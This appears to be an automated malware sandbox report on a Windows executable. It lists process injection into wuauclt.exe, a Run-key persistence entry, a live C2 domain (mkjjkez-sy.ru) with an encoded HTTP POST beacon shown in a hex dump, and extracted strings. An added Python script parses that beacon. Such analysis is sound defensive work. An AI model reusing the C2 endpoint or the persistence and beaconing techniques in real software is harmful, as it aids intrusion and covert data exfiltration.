Analysis Date: 2014-10-02 00:29:47
MD5: b49a7788464d328ee902d6d5e8b1ebc9
SHA1: 3a09957ca6555860055829b1156df46d9630d974

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Runtime Details:


Process
↳ C:\malware.exe

Creates Process: C:\malware.exe

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝ C:\Documents and Settings\All Users\Local Settings\Temp\msyqaaq.com\\x00
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\All Users\Local Settings\Temp\msyqaaq.com
Deletes File: C:\3A0995~1.EXE
Creates Mutex: 3227095050

Network Details:

DNS: www.update.microsoft.com.nsatc.net (Type: A) ➝ 134.170.0.157
DNS: www.update.microsoft.com.nsatc.net (Type: A) ➝ 157.56.107.155
DNS: mkjjkez-sy.ru (Type: A) ➝ 144.76.144.27
DNS: www.update.microsoft.com (Type: A)
HTTP POST: http://mkjjkez-sy.ru/andro/image.php
User-Agent: Mozilla/4.0
Flows: TCP 192.168.1.1:1031 ➝ 134.170.0.157:80
Flows: UDP 192.168.1.1:1032 ➝ 8.8.4.4:53
Flows: TCP 192.168.1.1:1033 ➝ 144.76.144.27:80

Raw Pcap
0x00000000 (00000)   504f5354 202f616e 64726f2f 696d6167   POST /andro/imag
0x00000010 (00016)   652e7068 70204854 54502f31 2e310d0a   e.php HTTP/1.1..
0x00000020 (00032)   486f7374 3a206d6b 6a6a6b65 7a2d7379   Host: mkjjkez-sy
0x00000030 (00048)   2e72750d 0a557365 722d4167 656e743a   .ru..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 0d0a436f    Mozilla/4.0..Co
0x00000050 (00080)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000060 (00096)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x00000070 (00112)   726d2d75 726c656e 636f6465 640d0a43   rm-urlencoded..C
0x00000080 (00128)   6f6e7465 6e742d4c 656e6774 683a2038   ontent-Length: 8
0x00000090 (00144)   380d0a43 6f6e6e65 6374696f 6e3a2063   8..Connection: c
0x000000a0 (00160)   6c6f7365 0d0a0d0a 66484741 54384133   lose....fHGAT8A3
0x000000b0 (00176)   2b6a6e65 6e435231 31717275 416a375a   +jnenCR11qruAj7Z
0x000000c0 (00192)   524c7843 4f316137 38324877 79535748   RLxCO1a782HwySWH
0x000000d0 (00208)   6f584e36 2b556648 57743635 586a6341   oXN6+UfHWt65XjcA
0x000000e0 (00224)   7662446e 50776b78 4a386772 6f513675   vbDnPwkxJ8groQ6u
0x000000f0 (00240)   4d67475a 6f6e6d66 48582b6b 6b766761   MgGZonmfHX+kkvga
0x00000100 (00256)                                         
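The dump above ends exactly at offset 256, so it is worth checking that the captured POST body is complete rather than cut off by the sandbox. The following Python is an added example for working the Raw Pcap section, not part of the sandbox report: it rebuilds the TCP payload from the hex rows (with an offset-continuity check so a dropped row is noticed), splits the HTTP request, compares the declared Content-Length with the bytes actually captured, and tests whether the body looks like the form data its Content-Type claims or like a single base64 token. The dump rows are copied verbatim from the report; the empty row at 0x00000100 is left out because it carries no bytes. What the decoded 66 bytes contain is not something the report shows, so the example only reports lengths and alphabet, not meaning.

```python
import base64
import re

# Hex-dump rows copied from the report's "Raw Pcap" section
# (hex offset, decimal offset, four 32-bit hex words, ASCII column).
RAW_PCAP_DUMP = """\
0x00000000 (00000)   504f5354 202f616e 64726f2f 696d6167   POST /andro/imag
0x00000010 (00016)   652e7068 70204854 54502f31 2e310d0a   e.php HTTP/1.1..
0x00000020 (00032)   486f7374 3a206d6b 6a6a6b65 7a2d7379   Host: mkjjkez-sy
0x00000030 (00048)   2e72750d 0a557365 722d4167 656e743a   .ru..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 0d0a436f    Mozilla/4.0..Co
0x00000050 (00080)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000060 (00096)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x00000070 (00112)   726d2d75 726c656e 636f6465 640d0a43   rm-urlencoded..C
0x00000080 (00128)   6f6e7465 6e742d4c 656e6774 683a2038   ontent-Length: 8
0x00000090 (00144)   380d0a43 6f6e6e65 6374696f 6e3a2063   8..Connection: c
0x000000a0 (00160)   6c6f7365 0d0a0d0a 66484741 54384133   lose....fHGAT8A3
0x000000b0 (00176)   2b6a6e65 6e435231 31717275 416a375a   +jnenCR11qruAj7Z
0x000000c0 (00192)   524c7843 4f316137 38324877 79535748   RLxCO1a782HwySWH
0x000000d0 (00208)   6f584e36 2b556648 57743635 586a6341   oXN6+UfHWt65XjcA
0x000000e0 (00224)   7662446e 50776b78 4a386772 6f513675   vbDnPwkxJ8groQ6u
0x000000f0 (00240)   4d67475a 6f6e6d66 48582b6b 6b766761   MgGZonmfHX+kkvga
"""

# One dump row: "0x<offset> (<decimal>)   <up to four hex words>   <ascii>".
# The {1,4} cap stops the match before the ASCII column.
ROW_RE = re.compile(r"^0x([0-9a-fA-F]{8}) \(\d+\)\s+((?:[0-9a-fA-F]{2,8} ?){1,4})")

# A body made only of the base64 alphabet, optionally padded.
B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]+={0,2}")


def reconstruct_payload(dump: str = RAW_PCAP_DUMP) -> bytes:
    """Rebuild the TCP payload from hex-dump rows. Each row's offset must
    equal the number of bytes already recovered, so a missing or
    duplicated row raises instead of silently corrupting the stream."""
    buf = bytearray()
    for line in dump.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        offset = int(m.group(1), 16)
        if offset != len(buf):
            raise ValueError(f"row 0x{offset:08x} does not follow the {len(buf)} bytes recovered so far")
        buf += bytes.fromhex(m.group(2).replace(" ", ""))
    return bytes(buf)


def parse_http_request(payload: bytes) -> dict:
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("end of headers not found in captured payload")
    lines = head.split(b"\r\n")
    method, target, version = lines[0].decode("ascii").split(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("ascii").partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def analyse_beacon(dump: str = RAW_PCAP_DUMP) -> dict:
    """Summarise the captured POST: where it went, whether the body is
    complete, and whether the body matches the declared content type."""
    req = parse_http_request(reconstruct_payload(dump))
    h, body = req["headers"], req["body"]
    declared = int(h.get("content-length", "-1"))
    is_b64 = B64_TOKEN.fullmatch(body) is not None and len(body) % 4 == 0
    return {
        "url": f"http://{h.get('host', '')}{req['target']}",
        "method": req["method"],
        "user_agent": h.get("user-agent"),
        "content_type": h.get("content-type"),
        "declared_length": declared,
        "captured_length": len(body),
        "body_complete": declared == len(body),
        # A genuine x-www-form-urlencoded body carries key=value pairs.
        "has_form_pairs": b"=" in body,
        "base64_alphabet": is_b64,
        "decoded_length": len(base64.b64decode(body, validate=True)) if is_b64 else None,
    }


if __name__ == "__main__":
    for key, value in analyse_beacon().items():
        print(f"{key:>16}: {value}")
```

Run against the report's dump, the 88 declared bytes are all present, the body contains no `=` (so it is not the form data the Content-Type claims) and it is a single 88-character base64-alphabet token that decodes to 66 bytes, which is the shape to expect when a client encrypts or encodes its check-in before posting it.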


Strings
....
...

$.>(
040904B0
2.01.0001
2&'2
!4YE
About 
*\AD:\8898799O87\tutu.vbp
CompanyName
Create a text file named 
`Ct`kfKylgjGx`kfKxlj
dxjw1
edfvtghjui
FileVersion
 file was not found? 
fkaS
G0Gv
iAsHB
InternalName
ltl4
MiUfV
M)kV[QcV[Q
MSINFO
\MSINFO32.EXE
Options
OriginalFilename
PATH
ProductName
ProductVersion
QV1OS
Show Tips at Startup
SOFTWARE\Microsoft\Shared Tools Location
SOFTWARE\Microsoft\Shared Tools\MSINFO
SRsAT
StringFileInfo
@struct
System Information Is Unavailable At This Time
That the 
Then place it in the same directory as the application. 
TIPOFDAY.TXT
Translation
ujnyhbtgvf
\Users
 using NotePad with 1 tip per line. 
VarFileInfo
vbII.10-2702.2000
vbII.10-2702.2000.exe
Version 
VS_VERSION_INFO
y7Wo
0000C0gyuhnj
20548488848494848989
{205484888484948489892.W
2054848884849484898978765567hgr012350k414oo5420548488848494848989ID
2702.2
(;4iAx
a7Rmq-
About MyApp
advapi32
App Description
Application Title
B2F4/*PX
>B7a^^\SOII
c@6(V!!VVT,
CallWindowProcW
chkLoadTipsAtStartup
CloseHandle
cmdNextTip
cmdSysInfo
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
CreateFileW
`.data
Did you know...
DisplayCurrentTip
DllFunctionCall
drfcvbghu
e;1>.00*($$$$
/EjAw"
EVENT_SINK_AddRef
EVENT_SINK_QueryInterface
EVENT_SINK_Release
F9)xTx9
frmAbout
frmTip
F:)yV<
GetKeyValue
GetModuleFileNameA
gyuhnj
	}h%JA
/h^jXT
iiNZXXXXTTTP////T
iVaa*m
iW`M`VWMWZKMKK7G70*0%79<9
kernel32
kernel32.dll
kerNel32.dll
KeyName
KeyRoot
KeyVal
Label1
lblDescription
lblDisclaimer
lblTipText
lblTitle
lblVersion
LoadLibraryW
LoadTips
MethCallEngine
MHO8|%
m{-QQ1
MSVBVM60.DLL
 MUt~R
&Next Tip
"'+[Nf
NNNNNNNNN)
n'?,&q
oooo0a
OpenProcess
picIcon
Picture1
pooo0a
ProcCallEngine
Process32First
Process32Next
q1YmZ4
-QCoIA
ReadFile
RegCloseKey
RegOpenKeyExA
RegQueryValueExA
rvrvoop[[[<<<<:::L49
&Show Tips at Startup
@?SiW:4
StartSysInfo
SubKeyRef
&System Info...
SystemParametersInfoA
TerminateProcess
!This program cannot be run in DOS mode.
Tip of the Day
t~|:Si
ttttt<|
U2?_ E
U4Qkh-
u		Hd@y
U'Qkd,
(*}uqn\
USER32
user32.dll
USER32.DLL
UU\}|p
<V91N^_
VBA6.DLL
__vbaExceptHandler
vbII.10-2702.2000
Version
&v*zhv
Warning: ...
wwwwwwp
wwwwwwW
wwWXwX
wXwxxwuuuw
XsmmppppppppppmC
xuuuewWwVWWw
xwuwuw
xwwxwWwW
||||xxpU
xxWwPw
xxxr0,
xXxxww|u}w
<yY"rq
}}yyyyvv|U
Z8C"gz{1
zhn"<Ff)Qy
/z_\W",AX